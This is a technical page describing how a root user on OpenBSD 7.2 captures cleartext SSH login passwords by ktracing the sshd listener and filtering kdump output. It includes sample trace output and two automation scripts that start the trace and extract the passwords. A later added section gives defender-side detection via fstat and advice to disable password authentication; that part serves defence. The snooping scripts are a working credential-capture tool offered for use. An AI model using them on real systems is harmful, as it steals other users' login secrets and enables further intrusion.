-------------------------------------
SSH password snooping on OpenBSD 7.2
-------------------------------------

# First get the parent PID of sshd

openbsd72# ps -aux | grep ssh | grep -v grep
root   17831  0.0  0.0  1100  1176 ??  I   1:06PM  0:00.14 sshd: /usr/sbin/sshd [listener] 0 of 10-100 startups (sshd)
root   42012  0.0  0.1  1172  3568 ??  I   1:06PM  0:00.51 sshd: user [priv] (sshd)
user   73361  0.1  0.1  1672  3456 ??  S   1:06PM  0:25.17 sshd: user@ttyp0 (sshd)
openbsd72#

In this case it will be PID 17831.

# Then initiate ktrace on the PID and all the corresponding I/O

ktrace -idg 17831
rm ktrace.out
# <! This is important, otherwise the file will just grow big and fill up the disk >
ktrace -ti -p 17831

# It will produce a ktrace.out file in the current working directory

# Then test it: SSH to the box from outside using some dummy wrong password.
# I have used the dummy password "FUCKTHIS".

# Read the text from ktrace.out via kdump

kdump -f ktrace.out

# The cleartext password supplied to sshd is located in a few places, but the most
# reliable one I could see is just above the NAMI "/usr/libexec/auth/login_passwd"
# filename lookup call

 43482 sshd     RET   write 1
 13409 sshd     CALL  dup2(8,3)
 13409 sshd     RET   dup2 3
 43482 sshd     CALL  write(5,0x1f15487218,0x9)
 43482 sshd     GIO   fd 5 wrote 9 bytes
       "FUCKTHIS\0"
 43482 sshd     RET   write 9
 13409 sshd     CALL  closefrom(4)
 43482 sshd     CALL  read(5,0x1ef4282068,0x2000)
 13409 sshd     RET   closefrom 0
 13409 sshd     CALL  execve(0x7ffffe3da0,0x7ffffe3a08,0x1f2a1f2210)
 13409 sshd     NAMI  "/usr/libexec/auth/login_passwd"
 13409 sshd     ARGS
       [0] = "passwd"
       [1] = "-s"
       [2] = "response"
       [3] = "--"
       [4] = "user"
       [5] = "staff"
 13409 login_passwd NAMI  "/usr/libexec/ld.so"

# To stop all ktrace dumping run

ktrace -C

# In order to automate all the above, here are 2 simple scripts

# START-SNOOP-SSH.sh

#!/bin/sh
echo "  /----------------------------/"
echo " /   OpenBSD OpenSSH SNOOPER   / "
echo "/----------------------------/ "
echo "started to dump SSHD process"
# PID of the sshd listener (the only sshd line that shows the binary path)
sshpid=$(ps -aux | grep "\/usr\/sbin\/sshd" | awk '{print $2}')
ktrace -idg $sshpid
# drop the first, full-size trace file before narrowing the trace to I/O
rm -f ktrace.out
ktrace -ti -p $sshpid
echo ""
echo "Now wait for somebody to SSH to this machine with a password"

----------------------------------------------------------

# READ-SNOOP-SSH.sh

#!/bin/sh
kdump -f ktrace.out > TEXT
# keep only the quoted data lines around the login_passwd lookup; kdump prints
# GIO payloads and ARGS entries on their own lines, so filtering the headers
# leaves just the strings
grep -A 6 -B 8 "NAMI \"\/usr\/libexec\/auth\/login_passwd\"" TEXT | grep -v GIO | grep -v RET | grep -v CALL | grep -v ARGS | grep -v NAMI | grep -v "\[0\]" | grep -v "\[1\]" | grep -v "\[3\]" | grep -v "\[2\]"
rm -f TEXT

----------------------------------------------------------
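Two checks from the defender's side, added here as an example and not part of the original page or its scripts. Attaching ktrace to another user's sshd needs root, so this is post-compromise credential capture; what a defender can do is notice it and remove the thing it captures. The script below assumes OpenBSD's fstat(1) lists a traced process's kernel trace file under the special FD name "tr" with the columns USER CMD PID FD MOUNT INUM MODE R/W DV|SZ, and that `sshd -T` prints the effective configuration as lowercase `keyword value` pairs (both as documented for OpenBSD/OpenSSH, but treat them as assumptions to verify on your host). The fstat and `sshd -T` text embedded in it is constructed sample data, not captured output. It reports which processes currently have a trace file attached (sshd should never be among them on a host nobody is debugging) and whether sshd still accepts password or keyboard-interactive logins; with key-only authentication no cleartext secret is written through sshd, so there is nothing in the trace for the READ script above to find.

```shell
#!/bin/sh
# Added defender-side checks for the ktrace snooping technique above; this is
# not code from the original page. Both checks read text on stdin so they can
# be exercised on captured output (the constructed samples below) or wired to
# the live commands with --live on an OpenBSD host.

# Constructed sample of fstat(1) output (not captured from a real host).
# Assumption: a ktrace'd process shows its trace file under the special
# FD name "tr", and the columns are USER CMD PID FD MOUNT INUM MODE R/W DV|SZ.
SAMPLE_FSTAT='USER CMD PID FD MOUNT INUM MODE R/W DV|SZ
root sshd 17831 tr / 12345 -rw-r--r-- w 8192
root sshd 17831 wd / 2 drwxr-xr-x r 512
user sshd 73361 0 / 4 crw--w---- rw ttyp0
root syslogd 5555 text / 99 -r-xr-xr-x r 50000'

# Constructed samples of "sshd -T" output (effective configuration, one
# lowercase "keyword value" pair per line). Assumption: this is the format
# sshd -T prints on OpenBSD 7.2's OpenSSH.
SAMPLE_SSHD_T_WEAK='passwordauthentication yes
kbdinteractiveauthentication no
pubkeyauthentication yes'
SAMPLE_SSHD_T_HARDENED='passwordauthentication no
kbdinteractiveauthentication no
pubkeyauthentication yes'

# Print "PID CMD" for every process that has a kernel trace file attached.
# On a host nobody is debugging this list should be empty; sshd in it means
# something is recording its I/O, login secrets included.
traced_processes() {
    awk '$4 == "tr" { print $3, $2 }'
}

# Return 0 if sshd still accepts a cleartext secret at login (password or
# keyboard-interactive), 1 if it is key-only.
password_auth_enabled() {
    awk '($1 == "passwordauthentication" || $1 == "kbdinteractiveauthentication") && $2 == "yes" { found = 1 }
         END { exit found ? 0 : 1 }'
}

# Live use on the host itself (run as root so fstat sees every process):
#   sh check-sshd-trace.sh --live
if [ "${1:-}" = "--live" ]; then
    echo "processes with a ktrace file attached:"
    fstat 2>/dev/null | traced_processes
    if /usr/sbin/sshd -T 2>/dev/null | password_auth_enabled; then
        echo "sshd accepts password/keyboard-interactive logins: a trace can capture them"
    else
        echo "sshd is key-only: no cleartext login secret passes through it"
    fi
fi
```

The fstat check is the cheap, point-in-time detection (a trace that was started and already stopped with `ktrace -C` leaves nothing for it to see, so pair it with file-integrity or periodic scheduling); the `sshd -T` check is the mitigation, since a password never typed cannot be recorded.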